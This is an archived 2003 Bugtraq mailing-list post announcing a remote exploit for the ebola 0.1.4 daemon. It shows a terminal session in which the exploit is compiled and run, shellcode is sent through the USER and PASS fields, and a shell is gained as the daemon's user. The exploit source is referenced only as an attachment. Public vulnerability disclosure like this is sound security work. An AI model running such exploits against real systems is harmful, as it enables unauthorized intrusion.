| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <001c01c3be77$1e2913a0$78bd5452@c0wboy>
Date: Tue, 9 Dec 2003 18:08:50 +0100
From: "c0wboy@...33" <c0wboy@...cali.it>
To: <bugtraq@...urityfocus.com>
Subject: ebola 0.1.4 remote exploit
Assuming "ebola" runned by sweep user (uid/gid == 333 :P)
bash-2.05b$ id
uid=333(sweep) gid=333(sweep) gruppi=333(sweep)
bash-2.05b$ pwd
/home/c0wboy/ebola-0.1.4
bash-2.05b$ ./ebola &
[1] 2077
bash-2.05b$ exit
exit
[c0wboy@...alhost ebola-0.1.4]$ cd $HOME
[c0wboy@...alhost c0wboy]$ gcc 0x333ebola.c -o ebola
[c0wboy@...alhost c0wboy]$ ./ebola -d localhost -t 0
--- 0x333ebola => ebola-0.1.4 remote exploit ---
--- Outsiders Se(c)urity Labs 2003 ---
_(0x0)_ Exploiting <localhost:1665> on RedHat 8.0 (Psyche)
_(0x1)_ Connected (!)
_(0x2)_ Sending USER (shellcode_1)
_(0x3)_ Sending PASS (shellcode_2)
(======owned======) (======owned======) (======owned======)
Linux localhost.localdomain 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686
i686 i386 GNU/Linux
uid=333(sweep) gid=333(sweep) groups=333(sweep)
echo "owned!" > /tmp/cya.txt
exit
Pipe rotta
[c0wboy@...alhost c0wboy]$ ls -al /tmp/cya.txt
-rw-rw-r-- 1 sweep sweep 7 dic 9 17:44 /tmp/cya.txt
[c0wboy@...alhost c0wboy]$ cat /tmp/cya.txt
owned!
[c0wboy@...alhost c0wboy]$
*Note* exploit is very unstable.
Download attachment "0x333ebola.c" of type "application/octet-stream" (6811 bytes)
Powered by blists - more mailing lists